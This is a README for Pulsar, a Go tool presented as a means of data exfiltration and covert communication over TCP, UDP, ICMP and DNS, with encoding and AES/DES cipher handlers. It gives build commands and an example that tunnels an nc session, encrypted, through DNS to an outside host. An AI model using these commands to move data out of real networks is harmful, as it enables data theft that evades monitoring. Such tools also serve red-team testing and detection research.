Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets.
Make sure you have at least Go 1.8 in your system to build Pulsar
First, getting the code from repository and compile it with following command:
$ export GOPATH=$(shell pwd)
$ go get golang.org/x/net/icmp
$ go build -o bin/pulsar src/main.go
or run:
A connector is a simple channel to the external world, with the connector you can read and write data from different sources.
Console: Default in/out connector, read data from stdin and write to stdout TCPRead and write data through tcp connections
UDPRead and write data through udp packet
ICMPRead and write data through icmp packet
Read and write data through dns packet
You can use option --in in order to select input connector and option --out to select output connector:
--out dns:fkdns.lol:2.3.4.5:8989
A handler allows you to change data in transit, you can combine handlers arbitrarily.
Stub:
Default, do nothing, pass throughBase32
Base32 encoder/decoder
Base64
Base64 encoder/decoder
Cipher
CTR cipher, support AES/DES/TDES in CTR mode (Default: AES)
You can use the --decode option to use ALL handlers in decoding mode
In the following example Pulsar will be used to create a secure two-way tunnel on DNS protocol, data will be read from TCP connection (simple nc client) and resend encrypted through the tunnel.
192.168.1.198:
$ nc 127.0.0.1 9000
192.168.1.199:
$ ./pulsar --in dns:[email protected]:8989 --out tcp:127.0.0.1:9900 --duplex --plain out --handlers 'cipher:supersekretkey!!' --decode
All contributions are always welcome